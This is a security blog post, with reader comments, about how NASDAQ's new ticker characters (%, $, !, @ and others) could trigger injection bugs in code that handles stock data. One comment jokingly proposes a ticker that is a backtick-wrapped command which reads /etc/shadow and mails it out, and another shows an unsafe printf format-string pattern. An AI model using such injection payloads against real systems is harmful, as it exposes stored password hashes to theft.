Cenzic 232 Patent
Paid Advertising
web application security lab

NASDAQ Symbology Change

In talking with one of my clients the topic of special characters came up and one of the things they mentioned being worried about was symbology changes at NASDAQ. For those of you who don’t follow this kind of stuff, the old ticker symbols constituted a fairly small subset of possible combinations. The symbology change was designed to allow greater flexibility in the future of the naming conventions (think about it being like the difference between IPv4 and IPv6 in the stock market). Click here to read more details.

That would probably be all fine and dandy except some of the characters actually mean things in programming languages. for instance % * # $ ~ + ! @ are included in the list of possible legal characters. How many lines of code do you think need to be reviewed and fixed before this actually will work seamlessly? My guess is many millions. How many new exploits do you think this will open? Hard to say, but it should be interesting to watch.

8 Responses to “NASDAQ Symbology Change”

  1. h3xstream Says:

    paranoia ? .. it’s not the first time that the ascii set is use in the history.
    what’s new ?

  2. i breaky your legs Says:

    well this would be a great adventure place for script kiddies ;-)

  3. Fred Says:

    The changes at NASDAQ? easy. The changes in the millions of applications that use NASDAQ data? Millions may be a low estimate.

    The exploit I’m looking forward to is this:
    Starting a company, going public, and then using the symbol $VAR.

  4. Dan Weber Says:

    Will someone actually be able to resist making their stock symbol $$$$ ?

    Well, I guess I would. Because my new company’s stock symbol is `cat /etc/shadow | mail danweber@me`.

  5. Ronald van den Heetkamp Says:

    For a long time I have trouble with our limited character set (lating-western). There isn’t a lot possible. If you look at Arabic or any other symbol language, you’ll notive that it’s far richer than ours. As far, that I also questioned the use of single and double quotes in programming languages. Mixing regular “text” literals with “code” really leads to many problems IMO.

    So we never had a clever separation of the two, due to limitation.

  6. RSnake Says:

    @h3xstream - clearly it’s not paranoia if it’s been used to attack systems in the past and the people working on it are actively worried about it. I like to call it reality. The part that was new was the symbology change, if that wasn’t clear.

    @Dan - I think it’s limited to 6 chars, and I’m not sure any kind of quotes are allowed. Keep thinking! ;)

  7. Tom Says:

    I understand certain parsing code, etc might need to be changed, but why does it matter that some of these symbols are used in certain programming languages? Strings are strings, and unless people are doing things like

    str = “%ABC”;
    printf(str);

    which they shouldn’t be, or hard coded variable names like “int %ABC” or something, I don’t see how that would matter?

    What languages are we talking about?

  8. Ronald van den Heetkamp Says:

    @Tom

    I was chatting about things like PHP for instance. Where stricly strings, or quotes are basically useless anyway. Since, PHP treats everything as string. So you see this:

    $b = 1;

    could be as this:

    $a = abcdefg;

    why not? since the integer/dec. is parsed as string also in PHP, why not dropping the quotes, it can be done and it should work. I get what the argument will be: PHP reads everything on 1 single line and parses it, yeah true but a space {string} semicolon should be enough. let alone the other signs.

    That’s why I favour Javascript so much for it’s genarally simple syntax, or even ASP where the ‘ single quote is used for commenting.